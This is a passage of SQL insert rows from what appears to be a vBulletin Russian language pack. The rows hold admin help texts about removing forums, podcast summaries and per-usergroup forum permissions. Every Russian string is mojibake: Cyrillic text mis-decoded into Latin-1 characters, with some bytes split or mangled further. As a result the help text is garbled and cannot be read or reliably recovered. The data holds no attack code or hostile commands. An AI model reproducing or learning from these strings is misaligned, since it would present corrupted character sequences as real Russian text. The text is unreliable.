(22420, -1, 'forum_podcast_summary_text', 'cphelptext', 'Ñîäåðæèìîå äà ÃÃîãî òåãà îòîáðà æà åòñÿ â îòäåëüÃîì îêîøêå iTunes, êîòîðîå ïîÿâëÿåòñÿ ïðè Ãà æà òèè Ãà êÃîïêó \"circled i\" â êîëîÃêå Îïèñà Ãèå. Åù¸ îÃî ïîÿâëÿåòñÿ Ãà ñòðà Ãèöå iTunes äëÿ âà øåãî ïîäêà ñòà . Ãòî ïîëå ìîæåò ñîäåðæà òü äî 4000 ñèìâîëîâ. Åñëè âû ÃÃ¥ çà ïîëÃèòå åãî, òî áóäåò èñïîëüçîâà Ãî îïèñà Ãèå âà øåãî ðà çäåëà .', 'vbulletin', 'zCarot', 1222352481, '3.8.0 Alpha 2'),
(22421, -1, 'forum_podcast_summary_title', 'cphelptext', 'Ñâîäêà ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(22422, -1, 'forum_remove_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå ïîäòâåðäèòü óäà ëåÃèå ðà çäåëà . Ãà æìèòå êÃîïêó \"Äà \" âÃèçó äëÿ ïîäòâåðæäåÃèÿ óäà ëåÃèÿ. Ãòà îïåðà öèÿ Ãåîáðà òèìà . \r\nÓäà ëåÃèå ýòîãî ðà çäåëà ïðèâåäåò ê óäà ëåÃèþ âñåõ òåì, ñîîáùåÃèé, à òà êæå ïîäðà çäåëîâ ñ èõ òåìà ìè è ñîîáùåÃèÿìè. Åñëè âû õîòèòå ñîõðà Ãèòü òåìû è ñîîáùåÃèÿ â ýòîì ðà çäåëå è åãî ïîäðà çäåëà õ, òîãäà âà ì ñëåäóåò ñÃà ÷à ëà ïåðåìåñòèòü èõ.', 'vbulletin', '', 0, ''),
(22423, -1, 'forum_remove_title', 'cphelptext', 'Óäà ëèòü ðà çäåë', 'vbulletin', '', 0, ''),
(22424, -1, 'forumpermission_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃà çäåëû \r\nÃðà âà â ðà çäåëà õ \r\nÌîäåðà òîðû \r\nÃðîñìîòð ïðà â< \r\n\r\nÃðà âà â ðà çäåëà õ: \r\nïî óìîë÷à Ãèþ, ïîëüçîâà òåëè áóäóò èìåòü ïðà âà äëÿ èõ ãðóïï ïîëüçîâà òåëåé (ñì. Óïðà âëåÃèå ãðóïïà ìè ïîëüçîâà òåëåé ) â êà æäîì ðà çäåëå. ÎäÃà êî, âû, âåðîÿòÃî, ïîæåëà åòå èçìåÃèòü ïðà âà äëÿ îòäåëüÃûõ ãðóïï ïîëüçîâà òåëåé â êà êèõ-òî ðà çäåëà õ.  ýòîì ñëó÷à å, ôîðóì ïîçâîëèò âà ì ñîçäà òü ñîáñòâåÃÃûå ïðà âà äëÿ óêà çà ÃÃîãî ðà çäåëà è óêà çà ÃÃîé ãðóïïû ïîëüçîâà òåëåé. Ãòî ïîëåçÃî â îòâåäåÃèè îïðåäåëåÃÃûõ ðà çäåëîâ îòäåëüÃûì ãðóïïà ì ïîëüçîâà òåëåé.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22425, -1, 'forumpermission_title', 'cphelptext', 'Î ïðà âà õ â ðà çäåëà õ', 'vbulletin', '', 0, ''),
(22426, -1, 'forumpermission_duplicate_text', 'cphelptext', 'Äóáëèðîâà Ãèå ïðà â - áûñòðûé ñïîñîá êîïèðîâà Ãèÿ ïðà â Ãà ðà çäåëå èç îäÃîé ãðóïïû â äðóãóþ(-èå) èëè èç îäÃîãî ðà çäåëà â äðóãîé(-èå). \r\n\r\nÄëÿ èñïîëüçîâà Ãèÿ äóáëèðîâà Ãèÿ ãðóïï âûáåðèòå ãðóïïó, èç êîòîðîé áóäóò êîïèðîâà òüñÿ ïðà âà . Çà òåì âûáåðèòå ãðóïïû, â êîòîðûå æåëà åòå ñêîïèðîâà òü ïðà âà èñòî÷Ãèêà . Âûáåðèòå â êà êîì ðà çäåëå äîëæÃî ïðîèñõîäèòü êîïèðîâà Ãèå ïðà â. Âûáðà ÃÃûé ðà çäåë áóäåò âêëþ÷åà âìåñòå ñî âñåìè ïîäðà çäåëà ìè. Ãà êîÃåö, âûáåðèòå, äîëæÃû ëè Ãîâûå ïðà âà ïåðåïèñûâà òü òåêóùèå ïðà âà , êîòîðûå óæå áûëè èçìåÃÃ¥Ãû, è äîëæÃû ëè îÃè áûòü ïðèìåÃÃ¥Ãû ê ðà çäåëà ì, êîòîðûå ÿâëÿþòñÿ Ãà ñëåäóþùèìè ýòèõ èçìåÃÃ¥ÃÃûõ ïðà â. Ãà æìèòå \"Äóáëèðîâà òü ïðà âà \" äëÿ ïðîäîëæåÃèÿ. \r\n\r\nÄóáëèðîâà Ãèå ðà çäåëîâ ðà áîòà åò ïîõîæèì ñïîñîáîì. ÑÃà ÷à ëà âûáåðèòå ðà çäåë, èç êîòîðîãî ñëåäóåò ñêîïèðîâà òü ïðà âà . ÃŽÃ ÃÃ¥ âêëþ÷à åò ïîäðà çäåëû. Çà òåì, âûáåðèòå ðà çäåëû, â êîòîðûå ñëåäóåò ñêîïèðîâà òü ïðà âà . Åñëè âû æåëà åòå ïåðåïèñà òü ñóùåñòâóþùèå ïðà âà , êîòîðûå áûëè èçìåÃÃ¥Ãû, òî âûáåðèòå äà â Ãåðåçà ïèñûâà òü Äóáëèêà òû. Óñòà Ãîâêà \"Äà \" â \"Ãåðåçà ïèñûâà òü Ãà ñëåäóåìûå\" ïåðåçà ïèøåò Ãà ñëåäóåìûå ïðà âà â ðà çäåëà õ, êîòîðûå Ãà ñëåäóþò ïðà âà èçìåÃÃ¥ÃÃûõ ðîäèòåëüñêèõ ðà çäåëîâ. Ãà æìèòå \"Äóáëèðîâà òü ïðà âà \" äëÿ ïðîäîëæåÃèÿ.', 'vbulletin', '', 0, ''),
(22427, -1, 'forumpermission_duplicate_title', 'cphelptext', 'Èñïîëüçîâà Ãèå äóáëèðîâà Ãèÿ ïðà â', 'vbulletin', '', 0, ''),
(22428, -1, 'forumpermission_duplicate_ugid_from_text', 'cphelptext', 'Âûáåðèòå ãðóïïó ïîëüçîâà òåëåé, ÷üè ïðà âà âû æåëà åòå ñêîïèðîâà òü. Ãðà âà ðà çäåëà âûáðà ÃÃîé ãðóïïû áóäóò ïðèìåÃÃ¥Ãû ê ãðóïïà ì ïîëüçîâà òåëåé, óêà çà ÃÃûì Ãèæå.', 'vbulletin', '', 0, ''),
(22429, -1, 'forumpermission_duplicate_ugid_from_title', 'cphelptext', 'Êîïèðîâà òü ïðà âà ãðóïïû', 'vbulletin', '', 0, ''),
(22430, -1, 'forumpermission_duplicate_usergrouplist_text', 'cphelptext', 'Âûáåðèòå ãðóïïû ïîëüçîâà òåëåé, êîòîðûì âû æåëà åòå äà òü ïðà âà ãðóïïû ïîëüçîâà òåëåé, óêà çà ÃÃîé âûøå. Òåêóùèå ïðà âà ýòèõ ãðóïï ïîëüçîâà òåëåé áóäóò ïåðåçà ïèñà Ãû ïðà âà ìè ãðóïïû ïîëüçîâà òåëåé, óêà çà ÃÃîé âûøå.', 'vbulletin', '', 0, ''),
(22431, -1, 'forumpermission_duplicate_usergrouplist_title', 'cphelptext', 'Êîïèðîâà òü ïðà âà â ãðóïïó', 'vbulletin', '', 0, ''),
(22432, -1, 'forumpermission_duplicate_limitforumid_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, â êîòîðîì âû æåëà åòå ñêîïèðîâà òü ïðà âà . Ãðà âà ãðóïïû ïîëüçîâà òåëåé - èñòî÷Ãèêà áóäóò ñêîïèðîâà Ãû Ãà ãðóïïû ïîëüçîâà òåëåé â ðà çäåëå, óêà çà ÃÃîì çäåñü.', 'vbulletin', '', 0, ''),
(22433, -1, 'forumpermission_duplicate_limitforumid_title', 'cphelptext', 'Êîïèðîâà òü ïðà âà òîëüêî â ðà çäåëå', 'vbulletin', '', 0, ''),
(22434, -1, 'forumpermission_duplicate_overwritedupes_group_text', 'cphelptext', 'Ãåðåçà ïèñü ïðîäóáëèðîâà ÃÃûõ çà ïèñåé ïðåäîòâðà ùà åò âà ñ îò ïåðåçà ïèñè êà êèõ-ëèáî äîïîëÃèòåëüÃûõ ïðà â äëÿ ýòîãî ðà çäåëà (îÃè âûäåëåÃû êðà ñÃûì) äëÿ îäÃîé ãðóïïû ïîëüçîâà òåëåé, êîòîðóþ âû êîïèðóåòå.', 'vbulletin', 'zCarot', 1222352544, '3.8.0 Alpha 2'),
(22435, -1, 'forumpermission_duplicate_overwritedupes_group_title', 'cphelptext', 'Ãåðåçà ïèñà òü ïðîäóáëèðîâà ÃÃûå ðà çðåøåÃèÿ', 'vbulletin', '', 0, ''),
(22436, -1, 'forumpermission_duplicate_overwriteinherited_group_text', 'cphelptext', 'Ãåðåçà ïèñü Ãà ñëåäóåìûõ çà ïèñåé ïðåäîòâðà ùà åò âà ñ îò ïåðåçà ïèñè êà êèõ-ëèáî Ãà ñëåäóåìûõ ïðà â äëÿ ýòîãî ðà çäåëà (îÃè âûäåëåÃû îðà Ãæåâûì) äëÿ îäÃîé ãðóïïû ïîëüçîâà òåëåé, êîòîðóþ âû êîïèðóéòå', 'vbulletin', 'zCarot', 1222352587, '3.8.0 Alpha 2'),
(22437, -1, 'forumpermission_duplicate_overwriteinherited_group_title', 'cphelptext', 'Ãåðåçà ïèñà òü Ãà ñëåäóåìûå ðà çðåøåÃèÿ', 'vbulletin', '', 0, ''),
(22438, -1, 'forumpermission_duplicate_forumid_from_text', 'cphelptext', 'Âûáåðèòå ðà çäåë, èç êîòîðîãî áóäóò ñêîïèðîâà Ãû ïðà âà ãðóïïû ïîëüçîâà òåëåé. Ãðà âà äëÿ ãðóïïû ïîëüçîâà òåëåé ðà çäåëà áóäóò â òî÷Ãîñòè ñîîòâåòñòâîâà òü ïðà âà ì óêà çà ÃÃîãî Ãèæå ðà çäåëà .', 'vbulletin', '', 0, ''),
(22439, -1, 'forumpermission_duplicate_forumid_from_title', 'cphelptext', 'Êîïèðîâà òü ïðà âà èç ðà çäåëà ', 'vbulletin', '', 0, ''),
(22440, -1, 'forumpermission_duplicate_forumlist_text', 'cphelptext', 'Âûáåðèòå ðà çäåë(û), â êîòîðûå âû æåëà åòå ñêîïèðîâà òü ïðà âà ãðóïïû ïîëüçîâà òåëåé èç ýòîãî ðà çäåëà . Ãðà âà äëÿ êà æäîé ãðóïïû ïîëüçîâà òåëåé äëÿ óêà çà ÃÃûõ ðà çäåëîâ áóäóò óñòà ÃîâëåÃû òî÷Ãî òà êæå, êà ê è Ãà ðà çäåëå-èñòî÷Ãèêå.', 'vbulletin', '', 0, ''),
(22441, -1, 'forumpermission_duplicate_forumlist_title', 'cphelptext', 'Êîïèðîâà òü ïðà âà â ðà çäåë', 'vbulletin', '', 0, ''),
(22442, -1, 'forumpermission_duplicate_overwritedupes_forum_text', 'cphelptext', 'Ãåðåçà ïèñü ïðîäóáëèðîâà ÃÃûõ çà ïèñåé ïðåäîòâðà ùà åò âà ñ îò ïåðåçà ïèñè êà êèõ-ëèáî äîïîëÃèòåëüÃûõ ïðà â äëÿ ýòîãî ðà çäåëà (îÃè âûäåëåÃû êðà ñÃûì).', 'vbulletin', 'zCarot', 1222352522, '3.8.0 Alpha 2'),
(22443, -1, 'forumpermission_duplicate_overwritedupes_forum_title', 'cphelptext', 'Ãåðåçà ïèñà òü ïðîäóáëèðîâà ÃÃûå ðà çðåøåÃèÿ', 'vbulletin', '', 0, ''),
(22444, -1, 'forumpermission_duplicate_overwriteinherited_forum_text', 'cphelptext', 'Ãåðåçà ïèñü Ãà ñëåäóåìûõ çà ïèñåé ïðåäîòâðà ùà åò âà ñ îò ïåðåçà ïèñè êà êèõ-ëèáî Ãà ñëåäóåìûõ ïðà â äëÿ ýòîãî ðà çäåëà (îÃè âûäåëåÃû îðà Ãæåâûì).', 'vbulletin', 'zCarot', 1222352566, '3.8.0 Alpha 2'),
(22445, -1, 'forumpermission_duplicate_overwriteinherited_forum_title', 'cphelptext', 'Ãåðåçà ïèñà òü Ãà ñëåäóåìûå ðà çðåøåÃèÿ', 'vbulletin', '', 0, ''),
(22446, -1, 'forumpermission_edit_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì ðåäà êòèðîâà òü ïðà âà âûáðà ÃÃîé ãðóïïû ïîëüçîâà òåëåé â âûáðà ÃÃîì ðà çäåëå. \r\n\r\nÅñëè âû ðåäà êòèðîâà ëè ïðà âà ýòîé ãðóïïû, òî âà ì ñëåäóåò âûáðà òü \"Èñïîëüçîâà òü äðóãèå Ãà ñòðîéêè\", ÷òîáû ñîõðà Ãèòü ñâîè èçìåÃÃ¥Ãèÿ Ãà ñòðîåê. Åñëè âû ïîïûòà åòåñü èçìåÃèòü Ãà ñòðîéêè äî âûáîðà \"Èñïîëüçîâà òü äðóãèå Ãà ñòðîéêè\", òî âà ì Ãà ïîìÃÿò ñäåëà òü ýòî, Ãà æà â ÎÊ. Åñëè âû Ãà æìåòå \"ÎòìåÃà \" â ïîÿâèâøèìñÿ îêÃÃ¥, òî Ãà ñòðîéêè èçìåÃÿòñÿ, Ãî ïðè ïîïûòêå ñîõðà Ãèòü èçìåÃÃ¥Ãèÿ ýòîãî ÃÃ¥ ïðîèçîéä¸ò. \r\n\r\nÃà ñòðîéêè Ãà ýòîé ñòðà Ãèöå à ÃÃóëèðóþò îáû÷Ãûå ïðà âà ãðóïïû ïîëüçîâà òåëåé. Åñëè ó âûáðà ÃÃîãî ðà çäåëà åñòü ïîäðà çäåëû, òî ýòè Ãà ñòðîéêè áóäóò óÃà ñëåäîâà Ãû âñåìè ïîäðà çäåëà ìè, ïðè óñëîâèè, ÷òî ïîäðà çäåëû ÃÃ¥ èìåþò ñâîèõ îòëè÷Ãûõ îò îáû÷Ãûõ Ãà ñòðîåê. \r\n\r\nÅñëè âû æåëà åòå âåðÃóòü îáû÷Ãûå ïðà âà äëÿ ýòîé ãðóïïû, òî âûáåðèòå \"Èñïîëüçîâà òü îáû÷Ãûå ïðà âà \" è Ãà æìèòå \"Ñîõðà Ãèòü èçìåÃÃ¥Ãèÿ\". Åñëè ó ðà çäåëà åñòü ïîäðà çäåëû, Ãà ñëåäóþùèå ýòè Ãà ñòðîéêè, òî îÃè òà êæå áóäóò âîññòà ÃîâëåÃû.', 'vbulletin', '', 0, ''),
(22447, -1, 'forumpermission_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïðà â ãðóïïû ïîëüçîâà òåëåé â ðà çäåëà õ', 'vbulletin', '', 0, ''),
(22448, -1, 'forumpermission_edit_canseethumbnails_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëü ñìîæåò âèäåòü ìèÃèà òþðû âëîæåÃÃûõ èçîáðà æåÃèé â òåìà õ, äà æå åñëè ó Ãåãî Ãåò ïðà â Ãà ñêà ÷èâà Ãèå âëîæåÃèé.', 'vbulletin', 'zCarot', 1219832213, '3.8.0 Alpha 1'),
(22449, -1, 'forumpermission_edit_canseethumbnails_title', 'cphelptext', 'Ìîæåò âèäåòü ìèÃèà òþðû', 'vbulletin', 'zCarot', 1219832213, '3.8.0 Alpha 1'),
(22450, -1, 'forumpermission_edit_mode_text', 'cphelptext', '×òîáû èçìåÃèòü êà êèå-ëèáî Ãà ñòðîéêè Ãà ýòîé ñòðà Ãèöå âû äîëæÃû âûáðà òü \"Èñïîëüçîâà òü äðóãèå ïðà âà \". Åñëè âû óæå óñòà Ãîâèëè äðóãèå ïðà âà è æåëà åòå âåðÃóòü îáû÷Ãûå ïðà âà äëÿ ýòîé ãðóïïû ïîëüçîâà òåëåé, âûáåðèòå \"Èñïîëüçîâà òü îáû÷Ãûå ïðà âà \" è Ãà æìèòå \"Ñîõðà Ãèòü èçìåÃÃ¥Ãèÿ\".\r\n\r\nÃîìÃèòå, ÷òî åñëè âû èçìåÃèëè ïðà âà ýòîé ãðóïïû ïîëüçîâà òåëåé è óäà ëèëè èõ èç îïèñûâà åìûõ âûøå, òî âñå ïîäðà çäåëû òà êæå áóäóò èçìåÃÃ¥Ãû, åñëè â Ãèõ ÃÃ¥ áûëè âûñòà âëåÃû äðóãèå ïðà âà .', 'vbulletin', '', 0, ''),
(22451, -1, 'forumpermission_edit_mode_title', 'cphelptext', 'Îáû÷Ãûå è äðóãèå Ãà ñòðîéêè ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(22452, -1, 'forumpermission_edit_quickforum_canview_text', 'cphelptext', 'Åñëè \"Ãåò\", òî îñòà ëüÃûå Ãà ñòðîéêè Ãà ýòîé ñòðà Ãèöå áåñïîëåçÃû è ó ïîëüçîâà òåëÿ ÃÃ¥ áóäåò äîñòóïà ê êà êèì-ëèáî ñòðà Ãèöà ì ýòîãî ðà çäåëà .', 'vbulletin', '', 0, ''),
(22453, -1, 'forumpermission_edit_quickforum_canview_title', 'cphelptext', 'Ìîãóò ïðîñìà òðèâà òü ðà çäåë', 'vbulletin', '', 0, ''),
(22454, -1, 'forumpermission_edit_quickforum_canviewthreads_text', 'cphelptext', 'Ãòî ðà çðåøåÃèå óïðà âëÿåò âîçìîæÃîñòüþ ïðîñìîòðà ïîëüçîâà òåëÿìè ñîîáùåÃèé âÃóòðè òåìû. Ãòî ðà çðåøåÃèå ÃÃ¥ çà âèñèò îò òîãî, ìîãóò ëè ïîëüçîâà òåëè ïðîñìà òðèâà òü ññûëêè Ãà òåìû.', 'vbulletin', '', 0, ''),
(22455, -1, 'forumpermission_edit_quickforum_canviewthreads_title', 'cphelptext', 'Ìîæåò ñìîòðåòü ñîäåðæèìîå òåì', 'vbulletin', '', 0, ''),
(22456, -1, 'forumpermission_edit_quickforum_canviewothers_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ñìîãóò ïðîñìà òðèâà òü òîëüêî ñâîè òåìû (â êîòîðûõ ïåðâîå ñîîáùåÃèå ñäåëà Ãî èìè).\r\n\r\nÅñëè ãðóïïà ïîëüçîâà òåëåé - \"ÃÃ¥ çà ðåãèñòðèðîâà ÃÃûå/ÃÃ¥ âîøåäøèå\", òî óñòà Ãîâêà ýòîé îïöèè Ãà \"Ãåò\" ïðèâåäåò ê òîìó, ÷òî ýòè ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ïðîñìà òðèâà òü Ãèêà êèå òåìû, äà æå åñëè âû ðà çðåøèëè Ãåçà ðåãèñòðèðîâà ÃÃûì ïîëüçîâà òåëÿì îñòà âëÿòü ñîîáùåÃèÿ, òà ê êà ê Ãåò ðà çäåëåÃèÿ Ãåçà ðåãèñòðèðîâà ÃÃûõ ïîëüçîâà òåëåé Ãà îòäåëüÃûå ëè÷Ãîñòè, è ïîÃÿòü ýòîò ëè Ãåçà ðåãèñòðèðîâà ÃÃûé ïîëüçîâà òåëü Ãà ÷à ë òåìó ÃåâîçìîæÃî.', 'vbulletin', '', 0, ''),
(22457, -1, 'forumpermission_edit_quickforum_canviewothers_title', 'cphelptext', 'Ìîãóò ïðîñìà òðèâà òü òåìû äðóãèõ', 'vbulletin', 'zCarot', 1205940618, '3.7.0 Release Candidate 1'),
(22458, -1, 'forumpermission_edit_quickforum_canseedelnotice_text', 'cphelptext', 'Åñëè \"Äà \", òî ýòà ãðóïïà áóäåò ñïîñîáÃà âèäåòü óâåäîìëåÃèÿ îá óäà ëåÃèè â ýòîì ðà çäåëå. ÓâåäîìëåÃèÿ îá óäà ëåÃèè - ýòî òî, ÷òî îñòà åòñÿ ïîñëå òîãî, êà ê ïîëüçîâà òåëü óäà ëèë ñîîáùåÃèå èëè òåìó. Ìîäåðà òîðû âñåãäà ñìîãóò ïîñìîòðåòü óâåäîìëåÃèÿ îá óäà ëåÃèè â ðà çäåëà õ, â êîòîðûõ îÃè ñëåäÿò çà ïîðÿäêîì - ýòà îïöèÿ ÃÃ¥ âëèÿåò Ãà Ãèõ.', 'vbulletin', '', 0, ''),
(22459, -1, 'forumpermission_edit_quickforum_canseedelnotice_title', 'cphelptext', 'Ìîãóò âèäåòü óâåäîìëåÃèÿ îá óäà ëåÃèè', 'vbulletin', '', 0, ''),
(22460, -1, 'forumpermission_edit_quickforum_cansearch_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ áóäóò èìåòü äîñòóï ê ïîèñêó ïî ðà çäåëó, äà æå åñëè îÃè ìîãóò ïðîñìà òðèâà òü è äåëà òü äðóãèå äåéñòâèÿ Ãà ä Ãèì. Ãà çäåë ÃÃ¥ áóäåò îòîáðà æà òüñÿ â ñïèñêå ðà çäåëîâ äëÿ ïîèñêà , è ÃÃ¥ áóäåò âêëþ÷åà â ïîèñê ïî âñåìó ôîðóìó.', 'vbulletin', '', 0, ''),
(22461, -1, 'forumpermission_edit_quickforum_cansearch_title', 'cphelptext', 'Ìîãóò èñïîëüçîâà òü ïîèñê', 'vbulletin', '', 0, ''),
(22462, -1, 'forumpermission_edit_quickforum_canemail_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò èñïîëüçîâà òü îïöèþ \"ÃëåêòðîÃÃîå ïèñüìî äðóãó\" (ññûëêà Ãà êîòîðóþ Ãà õîäèòñÿ âÃèçó êà æäîé òåìû). Ãòà îïöèÿ èãÃîðèðóåòñÿ, åñëè âû âûêëþ÷èëè îïöèè ýëåêòðîÃÃîé ïî÷òû â ãëà âÃûõ Ãà ñòðîéêà õ ôîðóìà - â ýòîì ñëó÷à å Ãèêòî ÃÃ¥ ìîæåò èñïîëüçîâà òü ôóÃêöèþ \"ÃëåêòðîÃÃîå ïèñüìî äðóãó\".', 'vbulletin', '', 0, ''),
(22463, -1, 'forumpermission_edit_quickforum_canemail_title', 'cphelptext', 'Ìîãóò èñïîëüçîâà òü îïöèþ \"ÃëåêòðîÃÃîå ïèñüìî äðóãó\"', 'vbulletin', '', 0, ''),
(22464, -1, 'forumpermission_edit_quickforum_cangetattachment_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ñêà ÷èâà òü âëîæåÃèÿ èç òåì ýòîãî ðà çäåëà . Ññûëêà âñå åùå áóäåò ïîÿâëÿòüñÿ, Ãî ïîñëå Ãà æà òèÿ Ãà Ãå¸ èì ñîîáùà ò îá îòñóòñòâèè ïðà â.', 'vbulletin', '', 0, ''),
(22465, -1, 'forumpermission_edit_quickforum_cangetattachment_title', 'cphelptext', 'Ìîãóò ñêà ÷èâà òü âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(22466, -1, 'forumpermission_edit_quickforum_canpostnew_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ñîçäà âà òü Ãîâûå òåìû â ýòîì ðà çäåëå. ÎäÃà êî, îÃè ìîãóò îñòà âëÿòü ñîîáùåÃèÿ â ñóùåñòâóþùèõ òåìà õ, åñëè âû ÃÃ¥ âûêëþ÷èëè ñîîòâåòñòâóþùóþ îïöèþ.', 'vbulletin', '', 0, ''),
(22467, -1, 'forumpermission_edit_quickforum_canpostnew_title', 'cphelptext', 'Ìîãóò ñîçäà âà òü Ãîâûå òåìû', 'vbulletin', '', 0, ''),
(22468, -1, 'forumpermission_edit_quickforum_canreplyown_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò îòâå÷à òü â ñîçäà ÃÃûõ èìè òåìà õ. Åñëè âû óñòà Ãîâèëè Ãà \"Ãåò\" îïöèþ \"Ìîæåò ñîçäà âà òü Ãîâûå òåìû\", òî ýòà îïöèÿ âñå ðà âÃî ÃÃ¥ áóäåò äåéñòâîâà òü.', 'vbulletin', '', 0, ''),
(22469, -1, 'forumpermission_edit_quickforum_canreplyown_title', 'cphelptext', 'Ìîãóò îòâå÷à òü â ñâîèõ òåìà õ', 'vbulletin', '', 0, ''),
(22470, -1, 'forumpermission_edit_quickforum_canreplyothers_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò îòâå÷à òü â òåìà õ, êîòîðûå Ãà ÷à ëè äðóãèå ïîëüçîâà òåëè.', 'vbulletin', '', 0, ''),
(22471, -1, 'forumpermission_edit_quickforum_canreplyothers_title', 'cphelptext', 'Ìîãóò îòâå÷à òü â òåìà õ äðóãèõ', 'vbulletin', 'zCarot', 1205940698, '3.7.0 Release Candidate 1'),
(22472, -1, 'forumpermission_edit_quickforum_followforummoderation_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïðè îñòà âëåÃèè Ãîâîãî ñîîáùåÃèÿ ïîëüçîâà òåëåì ýòîé ãðóïïû, ñîîáùåÃèÿ áóäóò îòïðà âëåÃû Ãà ïðîâåðêó ìîäåðà òîðà ì, âÃÃ¥ çà âèñèìîñòè îò òîãî, âêëþ÷èëè ëè âû ïðîâåðêó ñîîáùåÃèé Ãà ôîðóìå.', 'vbulletin', '', 0, ''),
(22473, -1, 'forumpermission_edit_quickforum_followforummoderation_title', 'cphelptext', 'Ãîâûå ñîîáùåÃèÿ ÃÃ¥ ïðîâåðÿþòñÿ', 'vbulletin', '', 0, ''),
(22474, -1, 'forumpermission_edit_quickforum_canpostattachment_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ïðèêðåïëÿòü âëîæåÃèÿ â ñîîáùåÃèÿ. ÃŽÃè âñå åùå ñìîãóò èñïîëüçîâà òü BB êîä \"IMG\" äëÿ îòîáðà æåÃèÿ èçîáðà æåÃèé, åñëè âû ðà çðåøèëè åãî â ýòîì ðà çäåëå.', 'vbulletin', '', 0, ''),
(22475, -1, 'forumpermission_edit_quickforum_canpostattachment_title', 'cphelptext', 'Ìîãóò ïðèêðåïëÿòü âëîæåÃèÿ', 'vbulletin', '', 0, ''),
(22476, -1, 'forumpermission_edit_quickforum_cantagown_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò äîáà âëÿòü ìåòêè ê ñâîèì òåìà ì â ýòîì ðà çäåëå.', 'vbulletin', 'zCarot', 1199285461, '3.7.0 Beta 4'),
(22477, -1, 'forumpermission_edit_quickforum_cantagown_title', 'cphelptext', 'Ìîãóò ïðèñâà èâà òü ìåòêè ñâîèì òåìà ì', 'vbulletin', 'zCarot', 1199285461, '3.7.0 Beta 4'),
(22478, -1, 'forumpermission_edit_quickforum_cantagothers_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò äîáà âëÿòü ìåòêè ê ÷óæèì òåìà ì â ýòîì ðà çäåëå.', 'vbulletin', 'zCarot', 1199285514, '3.7.0 Beta 4'),
(22479, -1, 'forumpermission_edit_quickforum_cantagothers_title', 'cphelptext', 'Ìîãóò ïðèñâà èâà òü ìåòêè ÷óæèì òåìà ì', 'vbulletin', 'zCarot', 1199285514, '3.7.0 Beta 4'),
(22480, -1, 'forumpermission_edit_quickforum_candeletetagown_text', 'cphelptext', 'Åñëè \"Äà \", òî ïîëüçîâà òåëè ýòîé ãðóïïû ñìîãóò óäà ëÿòü ìåòêè èç ñâîèõ òåì â ýòîì ðà çäåëå.', 'vbulletin', 'zCarot', 1199285555, '3.7.0 Beta 4'),
(22481, -1, 'forumpermission_edit_quickforum_candeletetagown_title', 'cphelptext', 'Ìîãóò óäà ëÿòü ìåòêè â ñâîèõ òåìà õ', 'vbulletin', 'zCarot', 1199285555, '3.7.0 Beta 4'),
(22482, -1, 'forumpermission_edit_quickforum_canthreadrate_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ýòîé ãðóïïû ÃÃ¥ ñìîãóò îöåÃèâà òü òåìû â ýòîì ðà çäåëå ÃÃ¥ çà âèñèìî îò òîãî âêëþ÷åà èëè Ãåò ðåéòèÃã.', 'vbulletin', '', 0, ''),
(22483, -1, 'forumpermission_edit_quickforum_canthreadrate_title', 'cphelptext', 'Ìîãóò îöåÃèâà òü òåìû, åñëè â ýòîì ðà çäåëå âêëþ÷åà ðåéòèÃã', 'vbulletin', '', 0, ''),
(22484, -1, 'forumpermission_edit_quickforum_caneditpost_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ.', 'vbulletin', '', 0, ''),
(22485, -1, 'forumpermission_edit_quickforum_caneditpost_title', 'cphelptext', 'Ìîãóò ðåäà êòèðîâà òü ñâîè ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22486, -1, 'forumpermission_edit_quickforum_candeletepost_text', 'cphelptext', 'Åñëè \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò óäà ëÿòü ñâîè ñîîáùåÃèÿ. ÃîìÃèòå, ÷òî åñëè ïà ðà ìåòð \"Ìîãóò óäà ëÿòü ñâîè òåìû\" óñòà Ãîâëåà Ãà \"Ãåò\", òî ïîëüçîâà òåëè ÃÃ¥ ñìîãóò óäà ëèòü ñâîå ïåðâîå ñîîáùåÃèå äà æå åñëè ýòà îïöèÿ âêëþ÷åÃà .', 'vbulletin', '', 0, ''),
(22487, -1, 'forumpermission_edit_quickforum_candeletepost_title', 'cphelptext', 'Ìîãóò óäà ëÿòü ñâîè ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
